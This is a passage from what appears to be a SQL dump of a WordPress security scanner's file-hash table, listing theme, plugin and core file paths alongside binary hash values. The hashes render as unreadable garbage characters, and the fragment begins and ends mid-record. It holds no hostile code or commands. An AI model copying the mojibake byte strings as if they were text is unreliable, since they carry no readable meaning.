�Z��ۑ�p�]','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����XP\0c��O�O�','n��J\Z,8��Y8{\0R��f��m�~���QɹZ','',0,'?'),('��6��:�$4�-Tg5','wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=�� ���L`B[','���V\"��\ZkY�cnUkYY$-,��y�\r�','',0,'?'),('��p��K�b��\0!�(��','wp-includes/css/dist/block-directory/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���gJ��^<','���\ZybF���v��J�}�z��Lj�� (','',0,'?'),('��+`ӥn����l','wp-content/themes/advance/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �M|��d��|r�\\�','�K�[U�<�\"��%k��d�IA;X�0ecU��f','',0,'?'),('����p�J �qI��m','wp-content/themes/showcase-lite/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','þ8w�^�l�������','�Կm�J�2@PIDi��B�h}�>F:�E^��','',0,'?'),('���G������V�3?','wp-content/themes/gambit/inc/widgets/widget-magazine-posts-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' C]n���,�0N�3�','<�.��x���kf�NGu!�?!ea�ת�X8�','',0,'?'),('���`e�>�s�ਝ�','wp-includes/wp-includes/images/smilies/icon_arrow.gif',0,' �J<�g��o�9:x',' �J<�g��o�9:x','�n�c���x0�ĥ���t��N���Y2X\0!','',0,'?'),('��Q+W�r�JQ̸B','wp-content/themes/vision-lite/customize-pro/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�$�8%L�����','\0[�Q�3���BæQ��o�B9�]5]�D�O�\'=','',0,'?'),('��O�֕�N&�&���2','wp-includes/wp-includes/author-template.php',0,'©ei+`љ�[��>q','©ei+`љ�[��>q','kt0���6�;��^@�ê��R Β�6�9r߯','',0,'?'),('��hxh�M*����S�','wp-content/plugins/wp-cerber/assets/flags/bn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C.M��sg:��','s�@�Zd}���x���-r���^�x8Z.���','',0,'?'),('���\0S���ɘ���`','wp-content/themes/wp-barrister/library/images/icon-email-sm.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H:\'!���X�0��','n9x��\r�\Z����:5d�d��CEc;�;��b','',0,'?'),('��|�~�������','wp-includes/sodium_compat/src/Core32/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')6��):�������','H0��L�ї?�㞹�.1�M�Ie��٣�','',0,'?'),('��b�������|e~�','wp-admin/css/customize-widgets.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x��]&?��I*1�e','�s������Wk�B��$oG��N��\n���','',0,'?'),('��Y��Z�ɲ�#','wp-content/themes/spidermag/assets/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W2B�c:I��\r7k','�,�.IA���L��/7�O*KB��cWZ�oDA','',0,'?'),('���al�V�?�f�\Zё�','wp-includes/IXR/class-IXR-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d߹��$c�9�','\0�{M��U�\rN.�)���-����`wH���','',0,'?'),('�\0h�Kf��\0�','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e�����','0��Q7018�ު9-�z9ؽq��SrĒ�P��','',0,'?'),('�W;{�w_*#��=*','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-item-control.php',0,'*:Uț�J>��h�z','*:Uț�J>��h�z','=��C����\0\"ȗ�gp�{��K�ϮD�\'�','',0,'?'),('������H�06�','wp-admin/images/browser.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K\\�b�$�F','&$�ĉ9����~_SH�_�̓�%L���\'&�','',0,'?'),('��2b���ڬ���\Z�','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-number-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���m� ̮&�L,B�9','�7w�1V�������ҧU���NNmP�r0���N','',0,'?'),('����8(\Z�j�Z]}','wp-includes/js/jquery/ui/effect-pulsate.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\0�q2�l����d','ȩ~��0M���0\"���7 ]1�sP�J�T','',0,'?'),('�-�(ҟ�oF�L���','wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ5�/�ҲP��C','�[T����4Gzݹo�ɓHL4�` �(��;�Gc','',0,'?'),('�-��Y���&�|�/�','wp-content/themes/newsmag/assets/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�^j��F/~1�f�<','`���vֽ.F���f��3�\0�J-`�]�)dm�','',0,'?'),('�?-@\"[���{�Љ;','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-dashicons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3ˢ$��Krǡ)Fb��','�tM�V_d�B���A��4�D�ڇ��ǒ}��3 (','',0,'?'),('�G!�=��$�M�7m�','wp-content/themes/auberge/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E3�s��F�t��k��v','�1t�߬!������p�D����2�Z�\Z��','',0,'?'),('�X�R�ev�� O��U','wp-includes/blocks/quote/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N`�^/��(��ǝ2�=','/{��Oe;gt@aݸG �/1Sv>��e̢kE','',0,'?'),('�X����g5��(�=c','wp-includes/js/tinymce/skins/lightgray/img/trans.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7I �1F�Gu�j^','�� �û���ͥJ��O�mO�:ϙ���l�W�5','',0,'?'),('�h�w^�(�n���','wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5+I6N,^�~��','x�u]!�%�\Z�|8c�˹��?�<M+GG������','',0,'?'),('�pt_ Y����7L�Kt','wp-admin/css/deprecated-media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���uְ�Z�l�\"�','�����K��ṥ�=���$�ϻ���]�C�i','',0,'?'),('�xz)���K���7@$B','wp-content/themes/event/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�ZԄ�\0��q','*�=��o� 7\0��uמ�wbh��ޛƆr<\'','',0,'?'),('�������X�\0T�O��','wp-content/themes/twentynineteen/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h�,��� p�A��','\0�4����^\ZY��i�_�O��_�#','',0,'?'),('���\'(jli�����','wp-content/themes/twentytwenty/template-parts/entry-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R0�5����wT��','�+�\\@o�g���\n�@��������','',0,'?'),('����T��D��F�K1�','wp-admin/css/media.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9��V80*�','\0-��ZGhV¥�\'�U\\ �����%d�','',0,'?'),('��-X؋ 뛰y�W�S�','wp-content/themes/advance/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q:^|�͖�8��','?I�F�1��pN��+��Y5��\'-�A~�1��^','',0,'?'),('��˳�}��N�3+Mg','wp-content/plugins/wordfence/js/jquery.tools.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:-��Eՠx�$�B',',�4�~aT�lS �fQO f���Tӵ��;��)','',0,'?'),('��/GΞӶ[�ǜ��C','wp-admin/js/gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kt���q �x','��7`YՓ<���9Y�i�l�۪�Kȯ��','',0,'?'),('���[�/�9}�`:w�P','license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��{�\0S�g��D���','��ы��I<�m�db�}��̑x��V�5/����','',0,'?'),('�ܩ_\n4�.���j','wp-content/themes/sg-window/genericons/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�R�����}YM(','��;�Ji2�4�{3��.��(^�Z}řۉ*E','',0,'?'),('���7�%�̬���&�','wp-includes/css/dist/block-library/common.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��XBI���mC�','Q�E��e��\r��_�1�Pj���W�r�','',0,'?'),('��Z%7��������','wp-includes/wp-includes/js/dist/date.min.js',0,';�̆H;M�6ɻj�',';�̆H;M�6ɻj�','w��y��D���~�`,�SM�\0�4+�MA','',0,'?'),('�\0�����.}�fwA','wp-includes/date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('�^��;X�)ڤ6)','wp-content/themes/sg-window/img/icons/google.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�c�h�R#?��9-','[�ayǟ(�,@z�5��z���Abr�t�̣�G�y','',0,'?'),('�!�����s!mQaf�','wp-content/themes/storeone/js/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:���n�6�H�','2�c�^�a�j���J����� h��3��p�','',0,'?'),('�$�[gJ��ϭ���Gx','wp-content/themes/sg-window/img/icons/small/ask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�_�3\0��!�g>/�e','϶�ml�Xd�~E�Z<�Z�0�\r��G�cwil','',0,'?'),('�\'6�3Vƞ\ZT���6�','wp-content/themes/advance/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}V�� ���5R�','���싋s����Of�[#�ι�o����\0��.\Z','',0,'?'),('�,p|醫�s��T?t&�','wp-includes/wp-includes/class-oembed.php',0,'j,;�\Z3�x���','j,;�\Z3�x���','��0�v�!�vv7�H�lV�d���i\'K�����','',0,'?'),('�-l�\"�3VBd�','wp-content/themes/newsmag/assets/vendors/offscreen/offscreen.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�ʮ� -�\r��\0k�','T�5�[8sVr�3f2s/q�H��mi*�K,e�','',0,'?'),('�.���FC�p���3��','wp-content/plugins/wordfence/js/wfdropdown.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����rp��c\'\Z�','��SG��s8;�Z�!�זJ�u�1�z?���','',0,'?'),('�J��S�h+.|�','wp-includes/wp-includes/js/tinymce/plugins/image/plugin.min.js',0,'-��ZC�l}�莐�','-��ZC�l}�莐�','y��T��Nz+������\'��%Y�','',0,'?'),('�N\n�i�{Z���J*','wp-includes/wp-includes/js/customize-models.js',0,'�\'�~G~�Ԟ�','�\'�~G~�Ԟ�','�h�3XVx�p��T��OSSfb��\r�E捵�','',0,'?'),('�Ye��}�te[[1w��','wp-content/themes/auberge/library/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�����Y�;��','��\r���7��f+66ozD�MDMs��3^+��U','',0,'?'),('�[���QH\"pS1Ȫ�c','wp-admin/images/arrows-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� Q�}��ydb#6�','�,c�˿\Z�i(~���)����\'��8[A�/�I��x','',0,'?'),('�kLǤe���(�ȸK','wp-content/plugins/wp-cerber/assets/flags/ch.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�k�g�iT���I�ކ','R���:�=b���U|O@��R�˂}��-','',0,'?'),('��^r ��_y)�\'w�]','wp-includes/wp-includes/js/jquery/ui/progressbar.js',0,'N��=i�D��_zy�\r3','N��=i�D��_zy�\r3','��_n�����)S����6�3+n�3���','',0,'?'),('��EV�-�,̛�3��`','wp-includes/wp-includes/customize/class-wp-customize-themes-panel.php',0,'�uZ���7ѳ����U','�uZ���7ѳ����U','aMk��M.�ݚ�fJ>����{�V���>v2U','',0,'?'),('��[ixT�q��~Wv�e','wp-admin/network/plugin-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�JY��Fq�^��N�','z��w�iL�_�*� !$c��L*�T�qDN_','',0,'?'),('��F~���y�c7v-','wp-includes/js/customize-preview-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�m� i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('���=�ŭ}������','wp-content/themes/hueman/assets/front/js/ie/respond.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��Ґ���\"����M','��P�\r���U9F�p����� <�n��N�','',0,'?'),('��4�/����H�x��','wp-content/themes/capacious/assets/css/owl.theme.default.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#�UG�F�^�\\3','�~X�t#g�4��\"�^ߔ9䲭��g��','',0,'?'),('�ӏ��!ʹ9�{�l�y�','wp-content/themes/capacious/inc/metabox/images/no-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�_ܬ՚n}���','�vBo�;� \0��n��\'�ފp�ui�','',0,'?'),('��H��_X�Ѕ�gU','wp-content/themes/twentytwentyone/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oL6-!讜k���y�t','��\0�<w����3=S��wT-|\"��uV�c � w','',0,'?'),('����Ѥ;D���','wp-content/plugins/wp-cerber/assets/flags/jp.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Jn@��Aל^�','��7���^qU���` �� �}wͧ�h��','',0,'?'),('�䑖�w�7:\'�h*','wp-includes/js/dist/vendor/lodash.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2n�B2���]�� �','\"��Qe��\\NJhb�Bj�{i�J\n�Қi;eZ�3','',0,'?'),('���xZY{��|X','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-palette-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��`����CJ0���','倚�Ȥ�>u�´�\0�NmQ�^�����Ń�1','',0,'?'),('�����s�%+1�;','wp-includes/wp-includes/Requests/Exception/HTTP/418.php',0,'J!�����[��4��','J!�����[��4��','4 �6鎬��M&�$!�2d<��\\ |\\�?g�\n','',0,'?'),('��8���;�S�ݽ�bg','wp-content/themes/anima/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H$c��B�m�yjV�','��ڻ9��9��:��I�t�/LGP��&��J~�','',0,'?'),('��z�^%���+[$��i�','wp-includes/wp-includes/Text/Diff.php',0,'\r� \ZV���:��','\r� \ZV���:��','�N\'�u�p���=Z�\"-��K����r','',0,'?'),('������]��+St�','wp-content/themes/sg-window/content-jetpack-portfolio-archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�hN�� ���{��1ӌk','�\Z��1M�����td=.5��o��Y,\")j���','',0,'?'),('���2���:�����','wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('��ة^k�\"��','wp-content/themes/weblog/acmethemes/customizer/options/options-reset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�K\nܯ���f�j%','w^�D �e����D|�Q�L�c\r9F)x�.[','',0,'?'),('�\Z-��x7�(A�4���','wp-includes/js/swfupload/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�`�^�-�o�QWz','��:)��6�a\"3r��\rP\rN�4�yJ�ַ��U�q','',0,'?'),('�P ����@\'�A)�','wp-content/themes/hueman/assets/admin/img/layout-off.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)����=~���p','���I�0�ݸ����x�#J �Xh�Bx�����','',0,'?'),('�(��\"����?4U','wp-content/themes/twentytwenty/assets/css/editor-style-classic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Vn-�C^�j�','CQA�FFC�z�R[ZM`�Gbf�2�A�pЋ���','',0,'?'),('�1W;c�����N�\"�u','wp-includes/pomo/streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�4�f��\"&:t#�\\','wp-content/themes/spidermag/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�53 Z�l�A&V��.�4','(\\�%��V��\"��ɜ�v�5�J�az(F�','',0,'?'),('�5$���p�#�e','wp-includes/wp-includes/images/smilies/icon_razz.gif',0,'9[�w���D�AM�A�','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('�6J��EMs���8hM','wp-content/themes/newsmag/assets/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&��H�*Š��,��6','�x��2��Ѽ2:���h��[��!�����','',0,'?'),('�;�Q�^�����>z��p','wp-content/themes/vision-lite/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,�/0�M��','m��*m*V�f�����q�TqU�!��','',0,'?'),('�>���zl��w��p','wp-content/themes/anima/includes/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=��b�;�G(B\\��','���}q�A<�L����������+�C��q��D�','',0,'?'),('�C�:L5D�aC��R9A','wp-content/themes/Endolf/FT/options/options.php',0,'��WI�[��j(�]�9�7','��WI�[��j(�]�9�7','��Y���ۋ��������@`^;&X','',0,'?'),('�Eޝ�Q�x.�wN��','wp-content/themes/sg-window/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ3��.S��M�<;','E*�o�)���,=v˓COJV_��D���](��)','',0,'?'),('�J��B�GT�;,l��T','wp-includes/images/smilies/icon_exclaim.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':\\��>5�\0r���sg�','�L�ɵ�H��A(�xʓ2�EP%� ��#���#�5','',0,'?'),('�O�-DK��tkE�j','wp-includes/wp-includes/embed.php',0,'V\Z���/}ͳYM=��','V\Z���/}ͳYM=��','6K�(|�/�R��̵�;$.�Jf8{�v�G�','',0,'?'),('�V�^�3��m6�._P','wp-includes/customize/class-wp-customize-background-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�@�t��j23��W','�4���0^+�u*�:ޓ4q[#��O��m�&�','',0,'?'),('�_r p�L�Ʒ��ʼn�','wp-includes/wp-includes/ID3/module.tag.apetag.php',0,'�\\)���H�G���>�','�\\)���H�G���>�','ٚ+��\"�Bt��� \'S_��̄E�s��_�)^�','',0,'?'),('�����r��v��CZ%�','wp-content/themes/pine/template-parts/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y)%�=�)ԫs-Jԣ','�N((\Z�E�R>���p��뱺�3M�^�','',0,'?'),('��i���Z/&�J8|�','wp-includes/wp-includes/js/dist/token-list.js',0,'�r�o��\Z�����#','�r�o��\Z�����#','r�����a����D����*�Q�R��4A�','',0,'?'),('���Y`���FΘ�,�','wp-includes/wp-includes/template-loader.php',0,'�z� ҿ��܌~���','�z� ҿ��܌~���','��\'4�h �䱺��[����E��%��J�H�','',0,'?'),('�����[���D?_�[�','wp-includes/random_compat/random_bytes_libsodium.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4������Տ��d�','�I�n��6��_����ga8��y��].��','',0,'?'),('���7�M3�$��','wp-includes/images/smilies/icon_question.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('��N|:G�\0��g��m��','wp-content/themes/gambit/css/genericons/Genericons.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�ө\n�/;]s>','4�+_�[�������qpv,��{�l������','',0,'?'),('����\n�zb�g�\0���','wp-content/themes/hueman/assets/front/css/main.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M<\nׇR�XB','=��X�A&��ǓCQ�bܥDZ�\nU2i�ef','',0,'?'),('����2@�k�w>K�2','wp-includes/feed-atom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{\r�g�\'SkI�fe�p�','!�I��m\nY��f+̕�P\0����13�\\=��','',0,'?'),('����H\0ۙ��h�C��','wp-admin/css/colors/ectoplasm/colors.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�D���9�j�K\\','~�2��H�3��.�4�\"���Fo�W��^܉','',0,'?'),('��\n�4jy��;7ZJ�','wp-content/themes/advance/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(��S�bY��w�&�','���>�\n|Zg �����^H�oZ?nG��IK','',0,'?'),('��wt�H���-s�\0�n','wp-includes/js/wplink.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7\"U��\"�?���','S\\�� ���ٺ�\'?��I��75�{','',0,'?'),('��]����1w㞜','wp-content/themes/sg-window/genericons/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[���鬓�/ؽ�&��','nq$�4�?9�Y|z��8!F��E���<�m>','',0,'?'),('���=֬H�@-i��','wp-includes/css/admin-bar-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����r���ju',',t�c* 2�����3ئI����4�j','',0,'?'),('����($5��^�7�','wp-content/themes/spidermag/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Dw>�������;�','��U:�ͻ;h#�3�����F�Lj��','',0,'?'),('���No$\'loq��v','wp-content/themes/hueman/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&~�m�[��U&��ʾ','��[fsO��y��y��O�s:z8u��I{','',0,'?'),('��h\n�e˗��\\/��','wp-content/themes/auberge/page-template/_menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�,s�k�K~','��� @2I}�np�_hp=�ܗ��H�t+0IW','',0,'?'),('�֔��ߚy(qD�w�','wp-content/plugins/wordfence/models/common/wfGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�YJs@j���r�jtm','�3ÑѲs��\r&�z=���ds��pJx�3�w','',0,'?'),('��\'�T[K�u��U','wp-includes/wp-includes/class-requests.php',0,'X@�?i� Xc����','X@�?i� Xc����','���$��\r7�U���M����]���g6�>C','',0,'?'),('��h�L���JH�X#0','wp-content/plugins/wordfence/lib/wfUnlockMsg.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�c)��Re�Y�l�7��','.�`�i�W� t1�}�sty�ɪ���!K','',0,'?'),('����Kǥݳ�|u��','wp-content/themes/twentytwentyone/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�:/=�P�|Ds�)�','v|�^�ц��E�O�x���̠R��ƌ$��G','',0,'?'),('��h�_��-�\rus{t�','wp-content/plugins/wp-cerber/assets/flags/bd.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_R�jQ�k.��4','k�j8�F��/���)�5��aC�,�12O�H\'','',0,'?'),('���^��\'�q���0��','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ln��j�\\w�X=7I','7���\"1j��L?9Y�\"��&���kŌVD�|��','',0,'?'),('�\"\\NR^���=��H�','wp-includes/wp-includes/category.php',0,'�`��k�3wh��k�͔','�`��k�3wh��k�͔','G�>�F|59��~�q|\n&\0��R l�','',0,'?'),('�\Z�D�SSS�&q���','wp-content/themes/promote/images/work_img1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����PϢ}�)�#�','c�������>�?�QYY�NZr��\"��^G<��[','',0,'?'),('�%n��Tߒ ^�gXΰ','wp-admin/js/inline-edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ub��:\\22B�E�C��','C��{�/I~��\Z\"\"e�UT��B���ވg','',0,'?'),('�3��aD�w�P����q','wp-admin/includes/class-theme-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ڪ&��텾��U�7y','��-R��RlG���cR�K��������a:���*>','',0,'?'),('�G���M�.��','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xY� i��F욤yG�','Z{���L��� �GNJ��\n� ����⪋��','',0,'?'),('�L(,�.����ZP/:�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z9գ��#����@�r��','K��uBi!�K�V�\0zW���=U�B 2�','',0,'?'),('�\\_8������d*jG','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����+PLh��h��_�','�/���+�B��&J�:ť�f�D��J+ ����','',0,'?'),('�b͌z��[����:�7','wp-content/themes/promote/js/unminified/jquery.matchHeight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�j/#��Ap杄R�','bkE���>C���F�i�_#�-B���K͚eKC','',0,'?'),('�h߭�g��}�i�<�','wp-content/themes/advance/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�바,��)��\r.�� ','����#Iџj�cm%Z:���\0����M����8','',0,'?'),('�ww��\\۵P}-�b��b','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-color-palette.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0���\Z����O','��K�!�l�̞�<�w�G �x6����A\0fj','',0,'?'),('�}\n�`B{0-�L5�m','wp-includes/wp-includes/js/jquery/ui/effect-puff.min.js',0,'�^��5�����t�','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('���E��c�+,����P','wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js',0,'�^���s�{��މ2','�^���s�{��މ2','�\Z�X8�c+�x�η����&Wg�`m�˴','',0,'?'),('��B\r�@js��w����\\','wp-content/themes/promote/inc/kirki/includes/styles/class-kirki-styles-frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T�WY��Z���','�Sfu��!�G��gS+b��e�3�+���','',0,'?'),('��n&���n�!崬�','wp-admin/css/site-icon.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�ˁx�J��TG���','�+���W���V��3�(qF���r;�|^�@��','',0,'?'),('���\\�k���\r�xC�O','wp-includes/wp-includes/blocks/archives/block.json',0,'u�P*�5�\\�d\"Sn�','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('���wJ����m��\n','wp-content/themes/anima/cryout/tgmpa-class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i1����@�j�Nhd\'�','\"JR�����K����.x�DŽR����]�q�H','',0,'?'),('��&��-w���.˚��','wp-includes/wp-includes/css/dist/block-editor/style-rtl.css',0,'�뺆�� �#��y�k~','�뺆�� �#��y�k~','(���䚆�u$/�/��f��Ш�۬x��M','',0,'?'),('����EX���|T��','wp-includes/blocks/media-text/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�0�y���~_>2�','ɗU�(���S�t��R��QYq�ex}I\'��P','',0,'?'),('�ײ� ��\\�:��X','wp-content/themes/pine/admin/js/pine-notifications.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���sN?�\'���\0�','�6�!Z���!��(h���33%$��c?�B','',0,'?'),('��Vr^T2���X�O���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�B� �?�{n��\Z','t�����p1��\ZQU�|O���\Z(0�\"tV[','',0,'?'),('�� �k-9eMԡR','wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php',0,'��3��NM[�/�\r~H','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��]j�l�\'��/x5','wp-includes/js/wp-sanitize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:k���E�t6Q��','yΦV�� }ɛq����K>ۈP6��*��C\ns}','',0,'?'),('���W��{�\\,�Yu�','wp-includes/js/jquery/ui/effect-explode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0���i!1�� �','s��e=\'���ڜ�N�I�{�U�!�M�E�s','',0,'?'),('��71���}\n��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�2+;�F���нNM��','�w��\"�*��5�U 